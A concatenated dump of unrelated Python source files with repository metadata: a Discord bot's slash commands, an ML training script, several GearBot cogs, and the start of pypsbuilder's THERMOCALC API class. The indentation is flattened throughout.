guild = bot.get_guild(int(secrets.GUILD_ID))
embed = discord.Embed(title=f'Available Channels:', description='\uFEFF',
colour=ctx.author.colour, timestamp=datetime.datetime.utcnow())
for channel in guild.channels:
if channel.name not in constants.BLOCKED_CHANNELS:
embed.add_field(name=f"{channel.name}:", value=channel.topic)
embed.set_footer(text=f"{ctx.author.name}",
icon_url=f"{ctx.author.avatar.url}")
await ctx.respond(embed=embed)
@bot.slash_command(description="Send files to specific channel.", guild_ids=[int(secrets.GUILD_ID)])
async def attach(
ctx: discord.ApplicationContext,
channel: Option(discord.TextChannel, "Select a channel"),
attachment: discord.Attachment
):
temp = channel.name
if temp not in constants.BLOCKED_CHANNELS:
guild = bot.get_guild(int(secrets.GUILD_ID))
tmp = await attachment.to_file(use_cached=False, spoiler=False)
for ch in guild.channels:
if ch.name == temp:
await ch.send(f"**{tmp.filename}** sent by "+ctx.author.mention)
await ch.send(file=tmp)
await ctx.respond("File sent!")
return
else:
await ctx.respond("You are not able to write messages in " + temp + " channel!")
@bot.slash_command(description="Shows all available commands.", guild_ids=[int(secrets.GUILD_ID)])
async def help(ctx: discord.ApplicationContext):
embed = discord.Embed(title=f'Available Commands:', description='\uFEFF',
colour=ctx.author.colour, timestamp=datetime.datetime.utcnow())
# For some reason help command is repeated twice in the list.
skip = 0
for command in bot.application_commands:
if command.description != "Shows all available commands.":
embed.add_field(name=f"{command}:", value=command.description)
else:
if skip == 1:
embed.add_field(name=f"{command}:", value=command.description)
skip += 1
embed.set_footer(text=f"{ctx.author.name}",
icon_url=f"{ctx.author.avatar.url}")
await ctx.respond(embed=embed)
bot.run(secrets.OPEN_SOURCE_TOKEN)
``` |
{
"source": "JohnySilva/mlhep-2021-comp2-code",
"score": 2
} |
#### File: JohnySilva/mlhep-2021-comp2-code/train.py
```python
import configparser
import pathlib as path
import torch
import numpy as np
import pytorch_lightning as pl
from pytorch_lightning import seed_everything
from idao.data_module import IDAODataModule
from idao.model import SimpleConv, Print
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from pytorch_lightning.callbacks import ModelCheckpoint
#device="cuda:2"
#%%
def trainer(mode: ["classification", "regression"], cfg, dataset_dm, filename):
model = SimpleConv(mode=mode)#.to(device)
if mode == "classification":
epochs = cfg["TRAINING"]["ClassificationEpochs"]
else:
epochs = cfg["TRAINING"]["RegressionEpochs"]
checkpoint_callback = ModelCheckpoint(
monitor='val_loss',
dirpath='checkpoint_model/',
filename=filename,
save_top_k=3,
mode='min',
)
trainer = pl.Trainer(
gpus=int(cfg["TRAINING"]["NumGPUs"]),
max_epochs=int(epochs),
progress_bar_refresh_rate=20,
weights_save_path=path.Path(cfg["TRAINING"]["ModelParamsSavePath"]).joinpath(
mode
),
default_root_dir=path.Path(cfg["TRAINING"]["ModelParamsSavePath"]),
callbacks=[EarlyStopping(monitor="val_loss"), checkpoint_callback]
)
# Train the model โก
trainer.fit(model, dataset_dm)
#%%
def main():
seed_everything(666)
config = configparser.ConfigParser()
config.read("./config.ini")
PATH = path.Path(config["DATA"]["DatasetPath"])
dataset_dm = IDAODataModule(
data_dir=PATH, batch_size=int(config["TRAINING"]["BatchSize"]), cfg=config
)
dataset_dm.prepare_data()
dataset_dm.setup()
filename='best_model_53/best_model-{epoch:02d}-{val_loss:.2f}'
#for mode in ["classification", "regression"]:
mode = "regression"
print(f"Training for {mode}")
trainer(mode, cfg=config, dataset_dm=dataset_dm, filename=filename)
if __name__ == "__main__":
main()
#%%
``` |
{
"source": "JohnyTheCarrot/GearBot",
"score": 3
} |
#### File: GearBot/Cogs/AntiRaid.py
```python
import discord
from discord.ext import commands
class AntiRaid:
def __init__(self, bot):
self.bot: commands.Bot = bot
async def sound_the_alarm(self, guild):
print("alarm triggered!")
pass
async def on_member_join(self, member: discord.Member):
# someone joined, track in redis, query
pass
def setup(bot):
bot.add_cog(AntiRaid(bot))
```
#### File: GearBot/Cogs/Basic.py
```python
import asyncio
import random
import time
from datetime import datetime
import discord
from discord.ext import commands
from discord.ext.commands import clean_content, BadArgument
from Util import Configuration, Pages, HelpGenerator, Permissioncheckers, Emoji, Translator, Utils, GearbotLogging
from Util.Converters import Message
from Util.JumboGenerator import JumboGenerator
from database.DatabaseConnector import LoggedAttachment
class Basic:
permissions = {
"min": 0,
"max": 6,
"required": 0,
"commands": {
}
}
def __init__(self, bot):
self.bot: commands.Bot = bot
Pages.register("help", self.init_help, self.update_help)
Pages.register("role", self.init_role, self.update_role)
self.running = True
self.bot.loop.create_task(self.taco_eater())
def __unload(self):
# cleanup
Pages.unregister("help")
Pages.unregister("role")
self.running = False
async def __local_check(self, ctx):
return Permissioncheckers.check_permission(ctx)
@commands.command()
async def about(self, ctx):
"""about_help"""
uptime = datetime.utcnow() - self.bot.start_time
hours, remainder = divmod(int(uptime.total_seconds()), 3600)
days, hours = divmod(hours, 24)
minutes, seconds = divmod(remainder, 60)
tacos = "{:,}".format(round(self.bot.eaten))
user_messages = "{:,}".format(self.bot.user_messages)
bot_messages = "{:,}".format(self.bot.bot_messages)
self_messages = "{:,}".format(self.bot.self_messages)
total = "{:,}".format(sum(len(guild.members) for guild in self.bot.guilds))
unique = "{:,}".format(len(self.bot.users))
embed = discord.Embed(colour=discord.Colour(0x00cea2),
timestamp=datetime.utcfromtimestamp(time.time()),
description=f"{Emoji.get_chat_emoji('DIAMOND')} Gears have been spinning for {days} {'day' if days is 1 else 'days'}, {hours} {'hour' if hours is 1 else 'hours'}, {minutes} {'minute' if minutes is 1 else 'minutes'} and {seconds} {'second' if seconds is 1 else 'seconds'}\n"
f"{Emoji.get_chat_emoji('GOLD')} I received {user_messages} user messages, {bot_messages} bot messages ({self_messages} were mine)\n"
f"{Emoji.get_chat_emoji('IRON')} Number of times people grinded my gears: {self.bot.errors}\n"
f"{Emoji.get_chat_emoji('STONE')} {self.bot.commandCount} commands have been executed, as well as {self.bot.custom_command_count} custom commands\n"
f"{Emoji.get_chat_emoji('WOOD')} Working in {len(self.bot.guilds)} guilds\n"
f"{Emoji.get_chat_emoji('INNOCENT')} With a total of {total} users ({unique} unique)\n"
f":taco: Together they could have eaten {tacos} tacos in this time\n"
f"{Emoji.get_chat_emoji('TODO')} Add more stats")
embed.add_field(name=f"Support server", value="[Click here](https://discord.gg/vddW3D9)")
embed.add_field(name=f"Website", value="[Click here](https://gearbot.aenterprise.info)")
embed.add_field(name=f"Github", value="[Click here](https://github.com/AEnterprise/GearBot)")
embed.set_footer(text=self.bot.user.name, icon_url=self.bot.user.avatar_url)
await ctx.send(embed=embed)
@commands.command(hidden=True)
async def ping(self, ctx: commands.Context):
"""ping_help"""
if await self.bot.is_owner(ctx.author):
t1 = time.perf_counter()
await ctx.trigger_typing()
t2 = time.perf_counter()
await ctx.send(
f":hourglass: REST API ping is {round((t2 - t1) * 1000)}ms | Websocket ping is {round(self.bot.latency*1000, 2)}ms :hourglass:")
else:
await ctx.send(":ping_pong:")
@commands.command()
@commands.bot_has_permissions(embed_links=True)
async def quote(self, ctx: commands.Context, *, message:Message):
"""quote_help"""
await ctx.trigger_typing()
member = message.guild.get_member(ctx.author.id)
if member is None:
await GearbotLogging.send_to(ctx, 'NO', 'quote_not_visible_to_user')
else:
permissions = message.channel.permissions_for(member)
if permissions.read_message_history and permissions.read_message_history:
if message.channel.is_nsfw() and not ctx.channel.is_nsfw():
await GearbotLogging.send_to(ctx, 'NO', 'quote_nsfw_refused')
else:
attachment = None
attachments = LoggedAttachment.select().where(LoggedAttachment.messageid == message.id)
if len(attachments) == 1:
attachment = attachments[0]
embed = discord.Embed(colour=discord.Color(0xd5fff),
timestamp=message.created_at)
if message.content is None or message.content == "":
if attachment is not None:
if attachment.isImage:
embed.set_image(url=attachment.url)
else:
embed.add_field(name=Translator.translate("attachment_link", ctx),
value=attachment.url)
else:
description = message.content
embed = discord.Embed(colour=discord.Color(0xd5fff), description=description,
timestamp=message.created_at)
embed.add_field(name="โ",
value=f"[Jump to message]({message.jump_url})")
if attachment is not None:
if attachment.isImage:
embed.set_image(url=attachment.url)
else:
embed.add_field(name=Translator.translate("attachment_link", ctx),
value=attachment.url)
user = message.author
embed.set_author(name=user.name, icon_url=user.avatar_url)
embed.set_footer(
text=Translator.translate("quote_footer", ctx,
channel=message.channel.name,
user=Utils.clean_user(ctx.author), message_id=message.id))
await ctx.send(embed=embed)
if ctx.channel.permissions_for(ctx.me).manage_messages:
await ctx.message.delete()
else:
await GearbotLogging.send_to(ctx, 'NO', 'quote_not_visible_to_user')
@commands.command()
async def coinflip(self, ctx, *, thing: str = ""):
"""coinflip_help"""
if thing == "":
thing = Translator.translate("coinflip_default", ctx)
else:
thing = await Utils.clean(thing, ctx.guild)
outcome = random.randint(1, 2)
if outcome == 1 or ("mute" in thing and "vos" in thing):
await ctx.send(Translator.translate("coinflip_yes", ctx, thing=thing))
else:
await ctx.send(Translator.translate("coinflip_no", ctx, thing=thing))
async def init_role(self, ctx):
pages = self.gen_role_pages(ctx.guild)
page = pages[0]
emoji = []
for i in range(10 if len(pages) > 1 else round(len(page.splitlines()) / 2)):
emoji.append(Emoji.get_emoji(str(i + 1)))
embed = discord.Embed(
title=Translator.translate("assignable_roles", ctx, server_name=ctx.guild.name, page_num=1,
page_count=len(pages)), colour=discord.Colour(0xbffdd), description=page)
return None, embed, len(pages) > 1, emoji
async def update_role(self, ctx, message, page_num, action, data):
pages = self.gen_role_pages(message.guild)
page, page_num = Pages.basic_pages(pages, page_num, action)
embed = discord.Embed(
title=Translator.translate("assignable_roles", ctx, server_name=message.channel.guild.name, page_num=page_num + 1,
page_count=len(pages)), color=0x54d5ff, description=page)
return None, embed, page_num
def gen_role_pages(self, guild: discord.Guild):
roles = Configuration.get_var(guild.id, "SELF_ROLES")
current_roles = ""
count = 1
for role in roles:
current_roles += f"{count}) <@&{role}>\n\n"
count += 1
if count > 10:
count = 1
return Pages.paginate(current_roles, max_lines=20)
@commands.command()
@commands.bot_has_permissions(embed_links=True)
@commands.guild_only()
async def role(self, ctx: commands.Context, *, role: str = None):
"""role_help"""
if role is None:
await Pages.create_new("role", ctx)
else:
try:
role = await commands.RoleConverter().convert(ctx, role)
except BadArgument as ex:
await ctx.send(Translator.translate("role_not_found", ctx))
else:
roles = Configuration.get_var(ctx.guild.id, "SELF_ROLES")
if role.id in roles:
try:
if role in ctx.author.roles:
await ctx.author.remove_roles(role)
await ctx.send(Translator.translate("role_left", ctx, role_name=role.name))
else:
await ctx.author.add_roles(role)
await ctx.send(Translator.translate("role_joined", ctx, role_name=role.name))
except discord.Forbidden:
await ctx.send(
f"{Emoji.get_chat_emoji('NO')} {Translator.translate('mute_role_to_high', ctx, role=role.name)}")
else:
await ctx.send(Translator.translate("role_not_allowed", ctx))
# @commands.command()
# async def test(self, ctx):
# async def send(message):
# await ctx.send(message)
# await Confirmation.confirm(ctx, "You sure?", on_yes=lambda : send("Doing the thing!"), on_no=lambda: send("Not doing the thing!"))
@commands.command()
async def help(self, ctx, *, query: str = None):
"""help_help"""
await Pages.create_new("help", ctx, query=query)
async def init_help(self, ctx, query):
pages = await self.get_help_pages(ctx, query)
if pages is None:
query_clean = await clean_content().convert(ctx, query)
return await clean_content().convert(ctx, Translator.translate(
"help_not_found" if len(query) < 1500 else "help_no_wall_allowed", ctx,
query=query_clean)), None, False, []
return f"**{Translator.translate('help_title', ctx, page_num=1, pages=len(pages))}**```diff\n{pages[0]}```", None, len(
pages) > 1, []
async def update_help(self, ctx, message, page_num, action, data):
pages = await self.get_help_pages(ctx, data["query"])
page, page_num = Pages.basic_pages(pages, page_num, action)
return f"**{Translator.translate('help_title', ctx, page_num=page_num + 1, pages=len(pages))}**```diff\n{page}```", None, page_num
async def get_help_pages(self, ctx, query):
if query is None:
return await HelpGenerator.command_list(self.bot, ctx)
else:
if query in self.bot.cogs:
return await HelpGenerator.gen_cog_help(self.bot, ctx, query)
else:
target = self.bot
layers = query.split(" ")
while len(layers) > 0:
layer = layers.pop(0)
if hasattr(target, "all_commands") and layer in target.all_commands.keys():
target = target.all_commands[layer]
else:
target = None
break
if target is not None and target is not self.bot.all_commands:
return await HelpGenerator.gen_command_help(self.bot, ctx, target)
return None
@commands.command()
@commands.bot_has_permissions(attach_files=True)
async def jumbo(self, ctx, *, emojis: str):
"""Jumbo emoji"""
await JumboGenerator(ctx, emojis).generate()
async def on_guild_role_delete(self, role: discord.Role):
roles = Configuration.get_var(role.guild.id, "SELF_ROLES")
if role.id in roles:
roles.remove(role.id)
Configuration.save(role.guild.id)
async def taco_eater(self):
"""A person can eat a taco every 5 mins, we run every 5s"""
GearbotLogging.info("Time to start munching on some ๐ฎ")
while self.running:
self.bot.eaten += len(self.bot.users) / 60
await asyncio.sleep(5)
GearbotLogging.info("Cog terminated, guess no more ๐ฎ for people")
async def on_raw_reaction_add(self, payload: discord.RawReactionActionEvent):
guild = self.bot.get_guild(payload.guild_id)
if guild is None:
return
if guild.me.id == payload.user_id:
return
try:
message = await self.bot.get_channel(payload.channel_id).get_message(payload.message_id)
except discord.NotFound:
pass
else:
if str(payload.message_id) in Pages.known_messages:
info = Pages.known_messages[str(payload.message_id)]
if info["type"] == "role":
for i in range(10):
e = Emoji.get_emoji(str(i + 1))
if payload.emoji.name == e:
roles = Configuration.get_var(guild.id, "SELF_ROLES")
channel = self.bot.get_channel(payload.channel_id)
number = info['page'] * 10 + i
if number >= len(roles):
await GearbotLogging.send_to(channel, "NO", "role_not_on_page", requested=number+1, max=len(roles) % 10, delete_after=10)
return
role = guild.get_role(roles[number])
if role is None:
return
member = guild.get_member(payload.user_id)
try:
if role in member.roles:
await member.remove_roles(role)
added = False
else:
await member.add_roles(role)
added = True
except discord.Forbidden:
emessage = f"{Emoji.get_chat_emoji('NO')} {Translator.translate('mute_role_to_high', payload.guild_id, role=role.name)}"
try:
await channel.send(emessage)
except discord.Forbidden:
try:
member.send(emessage)
except discord.Forbidden:
pass
else:
try:
action_type = 'role_joined' if added else 'role_left'
await channel.send(f"{member.mention} {Translator.translate(action_type, payload.guild_id, role_name=role.name)}", delete_after=10)
except discord.Forbidden:
pass
if channel.permissions_for(guild.me).manage_messages:
await message.remove_reaction(e, member)
break
def setup(bot):
bot.add_cog(Basic(bot))
```
#### File: GearBot/Cogs/Reload.py
```python
import asyncio
import importlib
import os
from discord.ext import commands
import Util
from Util import GearbotLogging, Emoji, Translator, DocUtils, Utils
class Reload:
def __init__(self, bot):
self.bot:commands.Bot = bot
async def __local_check(self, ctx):
return await ctx.bot.is_owner(ctx.author)
@commands.command(hidden=True)
async def reload(self, ctx, *, cog: str):
cogs = []
for c in ctx.bot.cogs:
cogs.append(c.replace('Cog', ''))
if cog in cogs:
self.bot.unload_extension(f"Cogs.{cog}")
self.bot.load_extension(f"Cogs.{cog}")
await ctx.send(f'**{cog}** has been reloaded.')
await GearbotLogging.bot_log(f'**{cog}** has been reloaded by {ctx.author.name}.', log=True)
else:
await ctx.send(f"{Emoji.get_chat_emoji('NO')} I can't find that cog.")
@commands.command(hidden=True)
async def load(self, ctx, cog: str):
if os.path.isfile(f"Cogs/{cog}.py") or os.path.isfile(f"GearBot/Cogs/{cog}.py"):
self.bot.load_extension(f"Cogs.{cog}")
await ctx.send(f"**{cog}** has been loaded!")
await GearbotLogging.bot_log(f"**{cog}** has been loaded by {ctx.author.name}.")
GearbotLogging.info(f"{cog} has been loaded")
else:
await ctx.send(f"{Emoji.get_chat_emoji('NO')} I can't find that cog.")
@commands.command(hidden=True)
async def unload(self, ctx, cog: str):
if cog in ctx.bot.cogs:
self.bot.unload_extension(f"Cogs.{cog}")
await ctx.send(f'**{cog}** has been unloaded.')
await GearbotLogging.bot_log(f'**{cog}** has been unloaded by {ctx.author.name}')
GearbotLogging.info(f"{cog} has been unloaded")
else:
await ctx.send(f"{Emoji.get_chat_emoji('NO')} I can't find that cog.")
@commands.command(hidden=True)
async def hotreload(self, ctx:commands.Context):
self.bot.hot_reloading = True
GearbotLogging.SHOULD_TERMINATE = True
message = await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji('REFRESH')} Hot reload in progress...")
ctx_message = await ctx.send(f"{Emoji.get_chat_emoji('REFRESH')} Hot reload in progress...")
GearbotLogging.info("Initiating hot reload")
await asyncio.sleep(2)
utils = importlib.reload(Util)
await utils.reload(self.bot)
GearbotLogging.info("Reloading all cogs...")
temp = []
for cog in ctx.bot.cogs:
temp.append(cog)
for cog in temp:
self.bot.unload_extension(f"Cogs.{cog}")
GearbotLogging.info(f'{cog} has been unloaded.')
self.bot.load_extension(f"Cogs.{cog}")
GearbotLogging.info(f'{cog} has been loaded.')
GearbotLogging.info("Hot reload complete.")
m = f"{Emoji.get_chat_emoji('YES')} Hot reload complete"
await message.edit(content=m)
await ctx_message.edit(content=m)
await Translator.upload()
await DocUtils.update_docs(ctx.bot)
self.bot.hot_reloading = False
@commands.command()
async def pull(self, ctx):
"""Pulls from github so an upgrade can be performed without full restart"""
async with ctx.typing():
code, out, error = await Utils.execute(["git pull origin master"])
if code is 0:
await ctx.send(f"{Emoji.get_chat_emoji('YES')} Pull completed with exit code {code}```yaml\n{out.decode('utf-8')}```")
else:
await ctx.send(
f"{Emoji.get_chat_emoji('NO')} Pull completed with exit code {code}```yaml\n{out.decode('utf-8')}\n{error.decode('utf-8')}```")
def setup(bot):
bot.add_cog(Reload(bot))
```
#### File: GearBot/Util/Pages.py
```python
import discord
from Util import Utils, Emoji, Translator
page_handlers = dict()
known_messages = dict()
def on_ready(bot):
load_from_disc()
def register(type, init, update, sender_only=False):
page_handlers[type] = {
"init": init,
"update": update,
"sender_only": sender_only
}
def unregister(type_handler):
if type_handler in page_handlers.keys():
del page_handlers[type_handler]
async def create_new(type, ctx, **kwargs):
text, embed, has_pages, emoji = await page_handlers[type]["init"](ctx, **kwargs)
message: discord.Message = await ctx.channel.send(text, embed=embed)
if has_pages or len(emoji) > 0:
data = {
"type": type,
"page": 0,
"trigger": ctx.message.id,
"sender": ctx.author.id
}
for k, v in kwargs.items():
data[k] = v
known_messages[str(message.id)] = data
try:
if has_pages: await message.add_reaction(Emoji.get_emoji('LEFT'))
for e in emoji: await message.add_reaction(e)
if has_pages: await message.add_reaction(Emoji.get_emoji('RIGHT'))
except discord.Forbidden:
await ctx.send(
f"{Emoji.get_chat_emoji('WARNING')} {Translator.translate('paginator_missing_perms', ctx, prev=Emoji.get_chat_emoji('LEFT'), next=Emoji.get_chat_emoji('RIGHT'))} {Emoji.get_chat_emoji('WARNING')}")
if len(known_messages.keys()) > 500:
del known_messages[list(known_messages.keys())[0]]
save_to_disc()
async def update(bot, message, action, user):
message_id = str(message.id)
if message_id in known_messages.keys():
type = known_messages[message_id]["type"]
if type in page_handlers.keys():
data = known_messages[message_id]
if data["sender"] == user or page_handlers[type]["sender_only"] is False:
page_num = data["page"]
try:
trigger_message = await message.channel.get_message(data["trigger"])
except discord.NotFound:
trigger_message = None
ctx = await bot.get_context(trigger_message) if trigger_message is not None else None
text, embed, page = await page_handlers[type]["update"](ctx, message, page_num, action, data)
await message.edit(content=text, embed=embed)
known_messages[message_id]["page"] = page
save_to_disc()
return True
return False
def basic_pages(pages, page_num, action):
if action == "PREV":
page_num -= 1
elif action == "NEXT":
page_num += 1
if page_num < 0:
page_num = len(pages) - 1
if page_num >= len(pages):
page_num = 0
page = pages[page_num]
return page, page_num
def paginate(input, max_lines=20, max_chars=1900, prefix="", suffix=""):
max_chars -= len(prefix) + len(suffix)
lines = str(input).splitlines(keepends=True)
pages = []
page = ""
count = 0
for line in lines:
if len(page) + len(line) > max_chars or count == max_lines:
if page == "":
# single 2k line, split smaller
words = line.split(" ")
for word in words:
if len(page) + len(word) > max_chars:
pages.append(f"{prefix}{page}{suffix}")
page = f"{word} "
else:
page += f"{word} "
else:
pages.append(f"{prefix}{page}{suffix}")
page = line
count = 1
else:
page += line
count += 1
pages.append(f"{prefix}{page}{suffix}")
return pages
def paginate_fields(input):
pages = []
for page in input:
page_fields = dict()
for name, content in page.items():
page_fields[name] = paginate(content, max_chars=1024)
pages.append(page_fields)
real_pages = []
for page in pages:
page_count = 0
page_fields = dict()
for name, parts in page.items():
base_name = name
if len(parts) is 1:
if page_count + len(name) + len(parts[0]) > 4000:
real_pages.append(page_fields)
page_fields = dict()
page_count = 0
page_fields[name] = parts[0]
page_count += len(name) + len(parts[0])
else:
for i in range(len(parts)):
part = parts[i]
name = f"{base_name} ({i+1}/{len(parts)})"
if page_count + len(name) + len(part) > 3000:
real_pages.append(page_fields)
page_fields = dict()
page_count = 0
page_fields[name] = part
page_count += len(name) + len(part)
real_pages.append(page_fields)
return real_pages
def save_to_disc():
Utils.saveToDisk("known_messages", known_messages)
def load_from_disc():
global known_messages
known_messages = Utils.fetch_from_disk("known_messages")
``` |
{
"source": "johnytian/pypsbuilder",
"score": 2
} |
#### File: pypsbuilder/pypsbuilder/psclasses.py
```python
import sys
import os
try:
import cPickle as pickle
except ImportError:
import pickle
import gzip
import subprocess
# import itertools
# import re
from pathlib import Path
# from collections import OrderedDict
import numpy as np
import matplotlib.pyplot as plt
from shapely.geometry import LineString, Point
from shapely.ops import polygonize, linemerge # unary_union
popen_kw = dict(stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=False)
polymorphs = [{'sill', 'and'}, {'ky', 'and'}, {'sill', 'ky'}, {'q', 'coe'}, {'diam', 'gph'}]
"""list: List of two-element sets containing polymorphs."""
class InitError(Exception):
pass
class ScriptfileError(Exception):
pass
class TCError(Exception):
pass
class TCAPI(object):
"""THERMOCALC working directory API.
Attributes:
workdir (pathlib.Path): Path instance pointing to working directory.
tcexe (pathlib.Path): Path instance pointing to *THERMOCALC* executable.
drexe (pathlib.Path): Path instance pointing to *dawpd* executable
name (str): Basename of the project.
axname (str): Name of a-x file in use.
OK (bool): Boolean value. True when all settings are correct and
THERMOCALC is ready to be used by builders.
excess (set): Set of excess phases from scriptfile.
trange (tuple): Tuple of temperature window from setdefTwindow
prange (tuple): Tuple of pressure window from setdefPwindow
bulk (list): List of bulk composition(s).
ptx_steps (int): Number of compositional steps for T-X and P-X sections.
phases (list): List of names of available phases.
TCenc (str): Encoding used for THERMOCALC output text files.
Default 'mac-roman'.
Raises:
InitError: An error occurred during initialization of working dir.
ScriptfileError: Error or problem in scriptfile.
TCError: THERMOCALC bombed.
"""
def __init__(self, workdir, tcexe=None, drexe=None):
self.workdir = Path(workdir).resolve()
self.TCenc = 'mac-roman'
try:
errinfo = 'Initialize project error!'
self.tcexe = None
self.drexe = None
if tcexe is not None:
self.tcexe = self.workdir / tcexe
if drexe is not None:
self.drexe = self.workdir / drexe
if self.tcexe is None:
# default exe
if sys.platform.startswith('win'):
tcpat = 'tc3*.exe'
else:
tcpat = 'tc3*'
# THERMOCALC exe
for p in self.workdir.glob(tcpat):
if p.is_file() and os.access(str(p), os.X_OK):
self.tcexe = p.resolve()
break
if self.drexe is None:
# default exe
if sys.platform.startswith('win'):
drpat = 'dr1*.exe'
else:
drpat = 'dr1*'
# DRAWPD exe
for p in self.workdir.glob(drpat):
if p.is_file() and os.access(str(p), os.X_OK):
self.drexe = p.resolve()
break
if not self.tcexe:
raise InitError('No THERMOCALC executable in working directory.')
# if not self.drexe:
# InitError('No drawpd executable in working directory.')
# tc-prefs file
if not self.workdir.joinpath('tc-prefs.txt').exists():
raise InitError('No tc-prefs.txt file in working directory.')
errinfo = 'tc-prefs.txt file in working directory cannot be accessed.'
for line in self.workdir.joinpath('tc-prefs.txt').open('r', encoding=self.TCenc):
kw = line.split()
if kw != []:
if kw[0] == 'scriptfile':
self.name = kw[1]
if not self.scriptfile.exists():
raise InitError('tc-prefs: scriptfile tc-' + self.name + '.txt does not exists in your working directory.')
if kw[0] == 'calcmode':
if kw[1] != '1':
raise InitError('tc-prefs: calcmode must be 1.')
if kw[0] == 'dontwrap':
if kw[1] != 'no':
raise InitError('tc-prefs: dontwrap must be no.')
# defaults
self.ptx_steps = 20 # IS IT NEEDED ????
# Checks various settings
errinfo = 'Scriptfile error!'
with self.scriptfile.open('r', encoding=self.TCenc) as f:
r = f.read()
lines = [ln.strip() for ln in r.splitlines() if ln.strip() != '']
lines = lines[:lines.index('*')] # remove part not used by TC
# Check pypsbuilder blocks
if not ('%{PSBCALC-BEGIN}' in lines and '%{PSBCALC-END}' in lines):
raise ScriptfileError('There are not {PSBCALC-BEGIN} and {PSBCALC-END} tags in your scriptfile.')
if not ('%{PSBGUESS-BEGIN}' in lines and '%{PSBGUESS-END}' in lines):
raise ScriptfileError('There are not {PSBGUESS-BEGIN} and {PSBGUESS-END} tags in your scriptfile.')
if not ('%{PSBBULK-BEGIN}' in lines and '%{PSBBULK-END}' in lines):
raise ScriptfileError('There are not {PSBBULK-BEGIN} and {PSBBULK-END} tags in your scriptfile.')
# Create scripts directory
scripts = {}
for ln in lines:
ln_clean = ln.split('%')[0].strip()
if ln_clean != '':
tokens = ln_clean.split(maxsplit=1)
if len(tokens) > 1:
if tokens[0] in scripts:
scripts[tokens[0]].append(tokens[1].strip())
else:
scripts[tokens[0]] = [tokens[1].strip()]
else:
scripts[tokens[0]] = []
# axfile
if 'axfile' not in scripts:
raise ScriptfileError('No axfile script, axfile is mandatory script.')
errinfo = 'Missing argument for axfile script in scriptfile.'
self.axname = scripts['axfile'][0]
if not self.axfile.exists():
raise ScriptfileError('axfile ' + str(self.axfile) + ' does not exists in working directory')
# diagramPT
if 'diagramPT' not in scripts:
raise ScriptfileError('No diagramPT script, diagramPT is mandatory script.')
errinfo = 'Wrong arguments for diagramPT script in scriptfile.'
pmin, pmax, tmin, tmax = scripts['diagramPT'][0].split()
self.prange = float(pmin), float(pmax)
self.trange = float(tmin), float(tmax)
# bulk
errinfo = 'Wrong bulk in scriptfile.'
if 'bulk' not in scripts:
raise ScriptfileError('No bulk script, bulk must be provided.')
if not (1 < len(scripts['bulk']) < 4):
raise ScriptfileError('Bulk script must have 2 or 3 lines.')
self.bulk = []
self.bulk.append(scripts['bulk'][0].split())
self.bulk.append(scripts['bulk'][1].split())
if len(scripts['bulk']) == 3:
self.bulk.append(scripts['bulk'][2].split()[:len(self.bulk[0])]) # remove possible number of steps
# inexcess
errinfo = 'Wrong inexcess in scriptfile.'
if 'setexcess' in scripts:
raise ScriptfileError('setexcess script depreceated, use inexcess instead.')
if 'inexcess' in scripts:
if scripts['inexcess']:
self.excess = set(scripts['inexcess'][0].split()) - set(['no'])
else:
raise ScriptfileError('In case of no excess phases, use inexcess no')
# omit
errinfo = 'Wrong omit in scriptfile.'
if 'omit' in scripts:
self.omit = set(scripts['omit'][0].split())
else:
self.omit = set()
# samecoding
if 'samecoding' in scripts:
self.samecoding = [set(sc.split()) for sc in scripts['samecoding']]
# pseudosection
if 'pseudosection' not in scripts:
raise ScriptfileError('No pseudosection script, pseudosection is mandatory script.')
# autoexit
if 'autoexit' not in scripts:
raise ScriptfileError('No autoexit script, autoexit must be provided.')
# dogmin
if 'dogmin' in scripts:
raise ScriptfileError('Dogmin script should be removed from scriptfile.')
# TC
errinfo = 'Error during initial TC run.'
calcs = ['calcP {}'.format(sum(self.prange) / 2),
'calcT {}'.format(sum(self.trange) / 2),
'with xxx']
old_calcs = self.update_scriptfile(get_old_calcs=True, calcs=calcs)
output = self.runtc()
self.update_scriptfile(calcs=old_calcs)
if '-- run bombed in whichphases' not in output:
raise TCError(output)
self.tcout = output.split('-- run bombed in whichphases')[0].strip()
ax_phases = set(self.tcout.split('reading ax:')[1].split(2 * os.linesep)[0].split())
# which
if 'with' in scripts:
if scripts['with'][0].split()[0] == 'someof':
raise ScriptfileError('Pypsbuilder does not support with sameof <phase list>. Use omit {}'.format(' '.join(ax_phases.union(*self.samecoding) - set(scripts['with'][0].split()[1:]))))
# union ax phases and samecoding and diff omit
self.phases = ax_phases.union(*self.samecoding) - self.omit
# OK
self.status = 'Initial check done.'
self.OK = True
except BaseException as e:
if isinstance(e, InitError) or isinstance(e, ScriptfileError) or isinstance(e, TCError):
self.status = '{}: {}'.format(type(e).__name__, str(e))
else:
self.status = '{}: {} {}'.format(type(e).__name__, str(e), errinfo)
self.OK = False
def __str__(self):
return str(self.workdir)
def __repr__(self):
if self.OK:
return '\n'.join(['{}'.format(self.tcversion),
'Working directory: {}'.format(self.workdir),
'Scriptfile: {}'.format('tc-' + self.name + '.txt'),
'AX file: {}'.format('tc-' + self.axname + '.txt'),
'Status: {}'.format(self.status)])
else:
return '\n'.join(['Uninitialized working directory {}'.format(self.workdir),
'Status: {}'.format(self.status)])
@property
def scriptfile(self):
"""pathlib.Path: Path to scriptfile."""
return self.workdir.joinpath('tc-' + self.name + '.txt')
def read_scriptfile(self):
with self.scriptfile.open('r', encoding=self.TCenc) as f:
r = f.read()
return r
@property
def drfile(self):
"""pathlib.Path: Path to -dr output file."""
return self.workdir.joinpath('tc-' + self.name + '-dr.txt')
@property
def logfile(self):
"""pathlib.Path: Path to THERMOCALC log file."""
return self.workdir.joinpath('tc-log.txt')
@property
def icfile(self):
"""pathlib.Path: Path to ic file."""
return self.workdir.joinpath('tc-' + self.name + '-ic.txt')
@property
def itfile(self):
"""pathlib.Path: Path to it file."""
return self.workdir.joinpath('tc-' + self.name + '-it.txt')
@property
def ofile(self):
"""pathlib.Path: Path to project output file."""
return self.workdir.joinpath('tc-' + self.name + '-o.txt')
@property
def csvfile(self):
"""pathlib.Path: Path to csv file."""
return self.workdir.joinpath('tc-' + self.name + '-csv.txt')
@property
def drawpdfile(self):
"""pathlib.Path: Path to drawpd file."""
return self.workdir.joinpath('dr-' + self.name + '.txt')
@property
def axfile(self):
"""pathlib.Path: Path to used a-x file."""
return self.workdir.joinpath('tc-' + self.axname + '.txt')
@property
def prefsfile(self):
